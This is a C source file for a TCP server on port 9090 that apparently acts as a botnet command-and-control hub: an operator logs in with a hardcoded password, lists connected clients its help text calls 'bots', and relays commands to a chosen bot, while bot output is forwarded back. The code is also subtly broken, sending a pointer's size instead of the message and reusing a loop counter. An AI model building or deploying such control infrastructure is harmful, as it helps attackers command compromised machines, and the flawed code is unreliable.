#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>       
#include <netinet/in.h>
#include <arpa/inet.h>      
#include <errno.h>          
#include <pthread.h>
#include "fatal.h"
#include "hexdump.h"
#include "banner.h"

#define PORT 9090


int main() {
    int server_socket, client_socket[30], new_socket, authorized_socket;
    int max_clients = 30, max_sd, addrlen, sd, activity, i, valread;
    int enabled = 1, con_clients=0;
    char buffer[1024]; 
    char password[] = "password\r\n";
    char *clientlist;
    fd_set readfds;    

    pbanner();

    char *message= "\n\rWELCOME AUTHENTICATED USER\n\r";

    for(i = 0; i < max_clients; i++){
        client_socket[i] = 0;              
    }

    struct sockaddr_in host_addr, client_addr;
    host_addr.sin_family = AF_INET;
    host_addr.sin_port = htons(PORT);
    host_addr.sin_addr.s_addr = INADDR_ANY;
    memset(&(host_addr.sin_zero), '\0', 8);

    if((server_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        fatal("SERVER SOCKET COULD NOT BE STARTED\n");

    if(setsockopt(server_socket, SOL_SOCKET, SO_REUSEADDR, &enabled, sizeof(int)) == -1)
        fatal("SETTING OPTION SO_REUSEADDR FAILED\n");

    if(bind(server_socket, (struct sockaddr*) &host_addr, sizeof(host_addr)) == -1)
        fatal("SERVER COULD NOT BIND TO HOST ADDRESS\n");

    if(listen(server_socket, 5) == -1)
        fatal("SERVER COULD NOT COMMENCE LISTENING\n");

    addrlen = sizeof(host_addr);
    printf("STANDBY FOR CONNECTIONS..\n");

 
    while(1) {

        FD_ZERO(&readfds);                          
        FD_SET(server_socket, &readfds);            
        max_sd = server_socket;


        for(i = 0; i < max_clients; i++)
        {
            sd = client_socket[i];

            if(sd > 0)                      
                FD_SET(sd, &readfds);

            if(sd > max_sd)               
                max_sd = sd;
        }

   
        activity = select( max_sd + 1, &readfds, NULL, NULL, NULL);


        if((activity < 0) && (errno!=EINTR)) {
            fatal("SELECT FUNCTION ERROR DURING MULTIPLEXING\n");
        }

    
        if(FD_ISSET(server_socket, &readfds)){
            if((new_socket = accept(server_socket, (struct sockaddr *)&client_addr, (socklen_t*)&addrlen)) == -1)
                fatal("SERVER COULD NOT ACCEPT NEW SOCKET FROM SERVER SOCKET\n");

            printf("[->] CONNECTION FROM %s:%d | FILE DESCRIPTOR IS %d\n",
                inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port), new_socket);

                con_clients++;



            for(i = 0; i < max_clients; i++) {
                if(client_socket[i] == 0)      
                {
                    client_socket[i] = new_socket;
                    printf("[--] ADDING TO LIST OF SOCKETS AS %d\n", i);
                    break;
                }
            }
        }

    
        for (i = 0; i < max_clients; i++) {
            sd = client_socket[i];

            if(FD_ISSET(sd, &readfds))
            {

                if((valread = read(sd, buffer, 1024)) == 0) 
                {
                    getpeername(sd, (struct sockaddr*)&client_addr, (socklen_t*)&addrlen);
                    printf("[!!] CLIENT DISCONNECTED %s:%d\n", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port));

                    con_clients--;

                 
                    close(sd);
                    client_socket[i] = 0;
                }

                else if (client_socket[i] == authorized_socket) {
                    buffer[valread] = '\0';
                    printf("[--] Command from %s:%d > %s", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port), buffer);
                    dump(buffer, strlen(buffer));


                    if(strncmp(buffer, "list", strlen("list")) == 0) {
                        for(i = 0; i < max_clients; i++) {
                            if(client_socket[i] != authorized_socket) {
                                getpeername(client_socket[i], (struct sockaddr*)&client_addr, (socklen_t*)&addrlen);
                                if(client_socket[i] != 0) {
                                    printf("[#%d] %s:%d\n", i, inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port));
                                    asprintf(&clientlist, "[#%d] %s:%d\r\n", i, inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port));
                                    send(authorized_socket, clientlist, strlen(clientlist), 0);
                                }
                            }
                        }
                    }

                    
                    else if(strncmp(buffer, "send", strlen("send")) == 0) {
                        int x = buffer[5] - '0';
                        char *a = strchr(buffer, ':');
                        *a = '\0';
                        printf("%d : %s\r\n", x, a + 1);
                        send(client_socket[x], a + 1, sizeof(a + 1), 0);
                    }

                  
                    else if(strncmp(buffer, "help", strlen("help")) == 0) {
                        send(authorized_socket, "list [lists bots]\r\n", strlen("list [lists bots]\r\n"), 0);
                        send(authorized_socket, "send <bot number>:<message> [sends a command to a bot]\r\n", strlen("send <bot number>:<message> [sends a command to a bot]\r\n"), 0);
                    }

                   
                }
                else if(strncmp(buffer, password, valread) == 0) {   
                    buffer[valread] = '\0';
                    printf("[--] Authenticated %s:%d\n", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port));
                    authorized_socket = client_socket[i];

                    char *welcome;
                    asprintf(&welcome, "%c]0;%s%d%c", '\033', "Clients connected: ", con_clients , '\007');

                    send(authorized_socket, welcome, strlen(welcome), 0);

                    if(send(new_socket, message, strlen(message), 0) != strlen(message))
                        fatal("SERVER COULD NOT SEND GREETING MESSAGE TO AUTHORIZED CLIENT\n");
                }
                else { 
                    buffer[valread] = '\0';
                    printf("[--] Message from %s:%d > %s", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port), buffer);
                    if(authorized_socket != 0)
                        send(authorized_socket, buffer, strlen(buffer), 0);
                }
            }
        }
    }
    return 0;
}
